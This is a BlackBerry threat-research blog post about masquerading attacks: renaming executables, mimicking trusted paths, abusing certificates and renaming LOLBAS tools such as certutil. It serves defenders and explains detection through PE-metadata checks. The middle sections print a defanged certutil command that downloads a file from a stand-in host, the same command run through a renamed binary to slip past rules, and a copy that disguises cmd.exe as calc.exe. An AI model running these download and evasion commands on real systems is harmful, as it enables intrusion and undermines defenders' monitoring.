Skip Navigation
BlackBerry Blog

Cyberattack Masquerade: How Threat Actors Blend In

Cybersecurity is like a game of cat and mouse. The defender must hunt an attacker that keeps obscuring itself in diverse ways and different places. One of these methods is masquerading, which hides an attack vector in plain sight by pretending to be something that you trust.

Masquerading is one of the oldest techniques in malevolent coding and is typically used to disguise malicious executables as trusted file types. Threat actors often attach these to phishing emails, such as the TXT file that was actually a VBS script in the famous case of the ILOVEYOU virus. The BlackBerry Threat Research and Intelligence Team explains that masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. The results can be deployment of a ransomware or spyware payload, with potentially expensive and damaging consequences.

“We urge all organizations to be aware of these attackers’ behaviors,” said Ismael Valenzuela, Vice President of Threat Research and Intelligence at BlackBerry. “The top alerts in all regions are simple things like the Certutil application and Exfiltration Station,” adds Natalia Ciapponi, BlackBerry Threat Emulation Lead. “There are simple things that are being used, which is why it's so important that we start building strategies to effectively detect and prevent this.”

This blog will explore what masquerading is, how it functions, and what mitigations can be put in place to combat it.

Understanding Masquerading Attacks

As detailed in our latest BlackBerry Global Threat Intelligence Report, masquerading (MITRE ATT&CK® Technique T1036) is a sophisticated cyberthreat tactic employed by attackers to disguise their activities and evade detection. For instance, when threat actors use a false name, icon, and metadata, they can easily disguise harmful actions as standard system operations.

Masquerading as a legitimate file or process can trick users and security software into opening or saving a malicious file, which can lead to system penetration and data loss.  

Here is a breakdown of common masquerading methods:

  1. Renaming Executables: Attackers often rename malicious executables to pretend they are a legitimate system program (e.g., svchost.exe, explorer.exe) and may change or add another fake extension to hide the real file type, such as .txt, .doc, .exe or .config. The goal is to trick users and security tools when running manual or automatic system checks, so the user will run or try to open the malicious file without heeding any system warnings.

  2. Mimicking File Paths: In a commonly trusted directory (e.g.: System32), there is less observation and detection from security tools. For that reason, attackers often place malicious files in these directories and give them legitimate process names to conceal them.

  3. Invalid Code Signature: Attackers may sign their malware with invalid or stolen digital certificates to bypass security measures. This misleads systems and users into trusting malicious files or processes by making them appear as if they are verified by a legitimate source. For example, to masquerade cmd.exe as a calculator app: Copy c:\windows\system32\cmd.exe C:\calc.exe. Attackers may use expired, revoked or fraudulently obtained certificates. Identifying such tactics requires robust certificate validation processes and alert systems that can flag unusual certificate data or failed validations.  

Unmasking Masquerading Attacks

From January through March 2024, BlackBerry® cybersecurity solutions prevented 3.1 million cyberattacks, equating to an average of more than 37,000 cyberattacks a day. According to the latest BlackBerry Global Threat Intelligence Report, the CylanceMDR™ team observed a spike in detections involving the renaming of legitimate tools.

BlackBerry threat researchers described in the report how threat actors use and abuse living-off-the-land binaries and scripts (LOLBAS) utilities: they often rename legitimate utilities (such as Certutil) to evade detection capabilities. Defenders must deploy robust detection capabilities to minimize the risk of these types of evasion techniques.  

In simpler times, creating a detection rule that only triggers when it sees the command Certutil (along with any options or arguments seen abused with this tool) might have done the trick. Now threat actors can easily evade this type of rule.  

Take the two commands below, for example:

certutil.exe -urlcache -split -f “hxxps://bbtest/badFile[.]txt” bad[.]txt

If your detection capabilities only rely on seeing the command Certutil (along with its options), this will be detected, but it could easily be evaded.

outlook.exe -urlcache -split -f “hxxps://bbtest/badFile[.]txt” bad[.]txt

In this case, we have renamed certutil.exe to outlook.exe and this would completely evade the detection (if using the logic discussed above).

A better solution would be to ensure that portable executable (PE) file/process metadata, such as the original file name (the internal file name provided at compile time), is collected and integrated into detection capabilities. A mismatch between the file name on disk and the binary’s PE metadata is a good indicator that a binary was renamed after compile time — in other words, a bad actor tampered with it.

Living off the Land: LOLBAS Activity

In our June 2024 Global Threat Intelligence Report, BlackBerry also noted a change in the LOLBAS activity seen within customer environments since last quarter’s report. These changes include the following:

  • Increasing detections related to regsvr32.exe. 

  • A decrease in mshta.exe-related activity.

  • A significant increase in detections related to bitsadmin.exe.

The table below illustrates an example of malicious LOLBAS usage during this reporting period.

lolbas-detections
LOLBAS detected by CylanceMDR (Source: BlackBerry Global Threat Intelligence Report, June 2024 Edition).

Mitigating Masquerading Attacks

While comparing file names to PE metadata is an effective approach for renamed executables, building the necessary metadata is a dynamic process that must continually evolve as new files are added and patches upgrade them. AI powered security tools can streamline this process. “AI helps everyone,” says Ciapponi. “If you're not an expert, you can ask for some assistance.”

Attackers are using AI too, to help find new ways to hide their activities. As they create smarter “mice,” defenders need to upgrade their “cats” to hunt them down. “We need to build better detections, not just signature detections because you can easily change the name of an executor,” concludes Ciappoini. “We need to build better detections to be more aware.”

It’s a never-ending process, but with the right security tools, your organization can stay ahead of threats that use masquerading to gain access to your environment.

For more actionable threat intelligence, read the latest edition of the BlackBerry Global Threat Intelligence Report, published each quarter. 

For similar blogs and news delivered right to your inbox, please subscribe to the BlackBerry Blog.
Bruce Sussman

About Bruce Sussman

Bruce Sussman is Senior Managing Editor at BlackBerry.